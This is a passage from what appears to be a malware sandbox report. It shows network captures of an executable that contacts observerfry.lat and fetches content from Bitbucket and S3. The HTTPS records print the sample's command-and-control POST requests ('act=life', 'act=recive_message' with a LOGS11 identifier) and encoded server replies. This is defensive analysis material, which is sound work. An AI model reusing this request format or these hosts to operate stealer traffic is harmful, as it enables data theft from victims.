Dec 24, 2024 08:54:14.503417015 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.503441095 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.503607035 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.510493040 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.510513067 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.510555983 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.510576963 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.510605097 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.510694027 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.512661934 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.517333984 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.517355919 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.517432928 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.517458916 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.517484903 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.517502069 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.517652035 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.524172068 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.524190903 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.524245024 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.524260998 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.524297953 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.524297953 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.524511099 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.545162916 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.670942068 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.670954943 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.670988083 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.671039104 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.671075106 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.671086073 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.677707911 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.677736044 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.677819967 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.677819967 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.677831888 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.684458017 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.684508085 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.684541941 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.684551954 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.684607029 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.685379028 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.685455084 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.685636044 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.691407919 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.691425085 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.691513062 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.691513062 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.691520929 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.691703081 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.692305088 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.698971033 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.698995113 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.699075937 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.699084997 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.699157000 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.705431938 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.705451965 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.705514908 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.705514908 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.705523014 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.712440968 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.712486982 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.712507963 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.712518930 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.712569952 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.718992949 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.719023943 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.719069958 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.719079971 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.719121933 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.760641098 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.760672092 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.770524979 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.866333961 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.866363049 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.866417885 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.866457939 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.866480112 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.867295027 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.867306948 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.873856068 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.873882055 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.873980999 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.873981953 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.874017954 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.880675077 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.880729914 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.880736113 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.880765915 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.880812883 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.887686014 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.887722015 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.887757063 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.887762070 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.887789965 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.887811899 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.887836933 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.894921064 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.894944906 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.894982100 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.894984007 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.894999027 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.895029068 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.901675940 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.901699066 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.901746988 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.901756048 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.901796103 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.908447981 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.908487082 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.908509970 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.908523083 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.908545971 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.925153017 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.925164938 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.925204992 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.950352907 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.236109972 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.236135960 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.236177921 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.236195087 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.236251116 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.237030983 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.237071037 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.237082005 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.237103939 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.237118006 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.237139940 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.237154961 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.237785101 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238753080 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238769054 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238835096 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.238842964 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238856077 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238883018 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238915920 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.238924026 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.238986015 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.647759914 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.945239067 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.945240021 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:15.945306063 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:15.945322037 CET	443	49752	52.217.14.36	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:53:44.745008945 CET	65362	53	192.168.2.7	1.1.1.1
Dec 24, 2024 08:53:44.883639097 CET	53	65362	1.1.1.1	192.168.2.7
Dec 24, 2024 08:54:08.478935957 CET	50671	53	192.168.2.7	1.1.1.1
Dec 24, 2024 08:54:08.616059065 CET	53	50671	1.1.1.1	192.168.2.7
Dec 24, 2024 08:54:10.693566084 CET	52825	53	192.168.2.7	1.1.1.1
Dec 24, 2024 08:54:10.846716881 CET	53	52825	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 08:53:44.745008945 CET	192.168.2.7	1.1.1.1	0xcd7b	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:08.478935957 CET	192.168.2.7	1.1.1.1	0xd34e	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.693566084 CET	192.168.2.7	1.1.1.1	0x5f2b	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 08:53:44.883639097 CET	1.1.1.1	192.168.2.7	0xcd7b	No error (0)	observerfry.lat		172.67.199.72	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:53:44.883639097 CET	1.1.1.1	192.168.2.7	0xcd7b	No error (0)	observerfry.lat		104.21.36.201	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:08.616059065 CET	1.1.1.1	192.168.2.7	0xd34e	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:08.616059065 CET	1.1.1.1	192.168.2.7	0xd34e	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:08.616059065 CET	1.1.1.1	192.168.2.7	0xd34e	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.14.36	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.230.145	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.112.193	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.36	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.125.9	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.201.57	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.199.57	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:54:10.846716881 CET	1.1.1.1	192.168.2.7	0x5f2b	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.139.203	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

observerfry.lat

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:46 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: observerfry.lat
2024-12-24 07:53:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 07:53:46 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=48rjs62vt6vkm1dmts2c51hncc; expires=Sat, 19 Apr 2025 01:40:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a7wNuukbOS7SM4CXQ6VFLSaYoNE62h%2B34pm5dAN8yEyifmvT0u79%2BLAZQxieIiDH0cABPzs57s3w2%2B6jhupQGKnyh%2Fu9pgA3Cz7swtYx2gwzMOErxaQH7rZH3mn268Ke4AA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f0500ff1ec443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1483&rtt_var=565&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1923583&cwnd=244&unsent_bytes=0&cid=1948e9b22266410c&ts=879&x=0"
2024-12-24 07:53:46 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 07:53:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:48 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: observerfry.lat
2024-12-24 07:53:48 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-24 07:53:48 UTC	1118	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5i5rrq1pvqnbago4tt37a8svup; expires=Sat, 19 Apr 2025 01:40:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PY4va%2BK2F7xvzHcMuFMmblkSsIqYFlQgGR8dYgUFV3VkuDTEoONz5hI53U5Z6CgugMgPjgOVvNm6qSwJNMvEBzUNKwTVw6h8ZvEIdD4kEeJHGTXspQlEHiIwcBnIt1sLDus%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f050e397f41d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1722&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1648785&cwnd=32&unsent_bytes=0&cid=792e7a15c5daea9d&ts=764&x=0"
2024-12-24 07:53:48 UTC	251	IN	Data Raw: 34 39 31 63 0d 0a 72 79 4b 78 77 6e 30 33 6e 64 69 51 68 33 75 39 54 4c 56 79 31 69 79 61 68 4d 2b 38 2b 46 46 4d 32 79 61 49 74 47 67 72 6b 66 50 55 41 4d 66 67 52 77 4f 78 2b 75 50 69 57 59 63 34 78 77 65 7a 41 4c 6a 6c 71 35 37 43 4e 79 32 33 56 65 32 59 53 6c 33 38 30 5a 56 45 30 4b 34 4f 55 72 48 36 39 66 39 5a 68 78 66 4f 55 4c 4e 43 75 4c 37 74 32 5a 49 7a 4c 62 64 45 36 64 38 48 57 2f 32 51 78 30 37 57 71 68 68 55 2b 62 6e 38 36 68 37 59 4b 64 51 59 75 45 58 33 37 4b 4b 65 31 48 4d 70 6f 51 53 79 6c 69 56 4f 35 5a 4c 69 51 38 4b 70 58 30 71 78 6f 37 4c 69 46 5a 39 32 6c 78 4f 7a 54 76 62 69 71 39 65 51 4f 53 53 2f 52 65 7a 65 47 45 4c 33 6d 38 64 41 31 61 73 53 58 65 32 30 39 75 30 56 33 69 50 55 55 50 6f 4f 2f 2f 37 74 68 74 70 67 48 Data Ascii: 491cryKxwn03ndiQh3u9TLVy1iyahM+8+FFM2yaItGgrkfPUAMfgRwOx+uPiWYc4xwezALjlq57CNy23Ve2YSl380ZVE0K4OUrH69f9ZhxfOULNCuL7t2ZIzLbdE6d8HW/2Qx07WqhhU+bn86h7YKdQYuEX37KKe1HMpoQSyliVO5ZLiQ8KpX0qxo7LiFZ92lxOzTvbiq9eQOSS/RezeGEL3m8dA1asSXe209u0V3iPUUPoO//7thtpgH
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 4c 70 56 2b 38 4d 48 57 66 58 52 30 67 37 4b 34 42 68 5a 76 2b 4b 79 37 52 58 52 4b 39 51 66 73 30 2f 34 39 4b 4c 65 6d 54 73 6d 76 55 37 6c 32 51 56 48 2b 5a 62 46 53 64 53 76 47 46 33 35 74 66 47 6c 56 35 38 70 7a 31 44 73 44 74 6a 32 72 74 32 4f 50 6a 2f 35 57 36 54 50 53 6b 37 2f 30 5a 55 41 31 61 34 65 57 50 2b 6f 2b 75 34 53 32 6a 7a 63 47 62 6c 44 2b 4f 75 6e 30 5a 6b 7a 4b 62 4e 4f 35 64 77 4f 52 50 36 58 7a 55 43 54 37 6c 39 53 35 2f 71 71 70 54 72 61 50 74 41 63 6f 67 7a 43 70 72 4b 51 67 33 4d 70 74 51 53 79 6c 67 4a 4d 38 4a 4c 47 54 39 43 6f 46 45 66 2f 71 50 54 6f 48 4d 30 6f 30 68 36 2b 54 65 72 73 6f 39 69 5a 4f 69 57 77 51 65 33 53 53 67 65 7a 6c 74 55 41 69 2b 41 2b 57 50 53 32 2b 50 49 5a 6e 7a 47 5a 43 66 52 4a 39 4b 62 31 6e 70 34 79 Data Ascii: LpV+8MHWfXR0g7K4BhZv+Ky7RXRK9Qfs0/49KLemTsmvU7l2QVH+ZbFSdSvGF35tfGlV58pz1DsDtj2rt2OPj/5W6TPSk7/0ZUA1a4eWP+o+u4S2jzcGblD+Oun0ZkzKbNO5dwORP6XzUCT7l9S5/qqpTraPtAcogzCprKQg3MptQSylgJM8JLGT9CoFEf/qPToHM0o0h6+Terso9iZOiWwQe3SSgezltUAi+A+WPS2+PIZnzGZCfRJ9Kb1np4y
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 72 52 45 67 6d 72 30 65 64 44 78 36 4d 56 46 38 71 35 2f 4f 73 65 79 57 37 49 58 71 30 4f 2f 2b 72 74 68 74 6f 2b 4c 37 46 43 2b 4e 6b 48 53 76 32 66 77 6b 58 63 71 42 39 56 38 72 2f 32 37 68 4c 63 49 39 4d 43 76 6b 37 77 34 36 7a 55 6b 48 4e 67 2b 55 50 79 6c 6c 49 4a 77 6f 62 47 41 75 61 6a 45 56 76 34 72 4c 4c 36 56 38 5a 75 30 42 7a 30 46 72 6a 72 70 64 75 66 50 43 2b 7a 53 75 2f 63 42 6b 48 39 6b 74 39 50 31 36 41 54 58 66 57 33 2f 4f 45 52 31 69 58 63 46 72 52 50 38 71 62 6a 6e 70 30 72 62 75 45 45 33 74 45 47 52 50 7a 54 2b 45 50 64 72 68 68 44 76 36 57 38 2f 46 6e 59 49 70 64 49 39 45 4c 78 35 71 62 55 6e 6a 4d 70 74 45 48 70 30 51 6c 45 39 4a 76 44 52 39 65 73 46 6c 6a 35 75 76 58 68 48 4d 30 72 33 68 79 34 44 72 61 6d 71 73 62 61 61 32 36 57 51 Data Ascii: rREgmr0edDx6MVF8q5/OseyW7IXq0O/+rthto+L7FC+NkHSv2fwkXcqB9V8r/27hLcI9MCvk7w46zUkHNg+UPyllIJwobGAuajEVv4rLL6V8Zu0Bz0FrjrpdufPC+zSu/cBkH9kt9P16ATXfW3/OER1iXcFrRP8qbjnp0rbuEE3tEGRPzT+EPdrhhDv6W8/FnYIpdI9ELx5qbUnjMptEHp0QlE9JvDR9esFlj5uvXhHM0r3hy4Dramqsbaa26WQ
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 4a 2b 70 6a 66 54 74 32 70 45 6c 50 33 76 66 7a 6f 45 74 6b 6c 30 42 65 79 51 2f 44 72 71 4e 32 62 4e 79 53 72 52 2b 48 63 42 30 4f 7a 33 34 31 48 79 2b 42 48 46 64 69 32 32 2f 55 43 7a 54 69 58 44 2f 70 58 75 4f 47 68 6e 73 4a 7a 4c 62 5a 4e 35 64 34 43 52 76 79 56 77 30 62 56 72 52 70 61 39 61 6a 36 36 78 54 55 49 64 77 43 74 45 50 38 36 71 6e 57 6b 54 6c 75 39 77 54 74 7a 6b 6f 52 73 36 54 41 54 39 4f 6a 43 52 58 67 39 4f 75 6c 48 74 4e 75 6a 31 43 34 51 50 6a 70 6f 64 4b 52 4f 79 2b 31 53 75 33 54 41 30 48 37 67 38 78 45 32 36 45 52 57 76 36 2b 39 2b 41 64 32 43 72 52 48 2f 51 41 75 4f 47 31 6e 73 4a 7a 41 5a 35 78 71 50 63 77 43 65 7a 66 31 41 44 55 72 46 38 4e 76 37 62 78 36 52 48 51 4b 4e 34 63 76 6b 66 7a 36 71 62 61 6c 6a 6f 72 76 30 58 76 30 77 Data Ascii: J+pjfTt2pElP3vfzoEtkl0BeyQ/DrqN2bNySrR+HcB0Oz341Hy+BHFdi22/UCzTiXD/pXuOGhnsJzLbZN5d4CRvyVw0bVrRpa9aj66xTUIdwCtEP86qnWkTlu9wTtzkoRs6TAT9OjCRXg9OulHtNuj1C4QPjpodKROy+1Su3TA0H7g8xE26ERWv6+9+Ad2CrRH/QAuOG1nsJzAZ5xqPcwCezf1ADUrF8Nv7bx6RHQKN4cvkfz6qbaljorv0Xv0w
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 33 30 37 65 72 78 64 64 39 72 76 32 34 42 54 5a 49 74 30 52 73 30 44 32 37 75 32 51 32 6a 51 32 2b 52 79 71 39 78 70 53 34 59 66 41 59 64 36 76 58 30 71 78 6f 37 4c 69 46 5a 39 32 6c 78 6d 6d 53 76 58 30 70 4e 6d 55 50 43 32 72 52 65 66 64 47 45 37 38 6c 63 70 4d 31 61 38 5a 56 50 71 77 2f 75 49 63 31 43 48 62 55 50 6f 4f 2f 2f 37 74 68 74 6f 64 4a 61 70 54 36 64 67 42 58 2b 6a 52 30 67 37 4b 34 42 68 5a 76 2b 4b 79 35 68 4c 55 4b 74 63 63 74 45 72 31 35 72 2f 52 6e 54 51 6e 73 6c 62 67 30 51 31 43 2b 35 72 43 52 73 47 73 45 55 66 36 71 4f 43 6c 56 35 38 70 7a 31 44 73 44 73 37 68 76 63 36 5a 63 52 2b 76 52 2f 7a 64 42 30 57 7a 6a 6f 4e 5a 6b 36 63 54 46 61 66 36 39 4f 6f 51 33 43 48 57 47 62 68 44 2f 65 2b 6f 33 35 77 33 4a 4c 4e 45 37 4e 41 4c 54 50 6d Data Ascii: 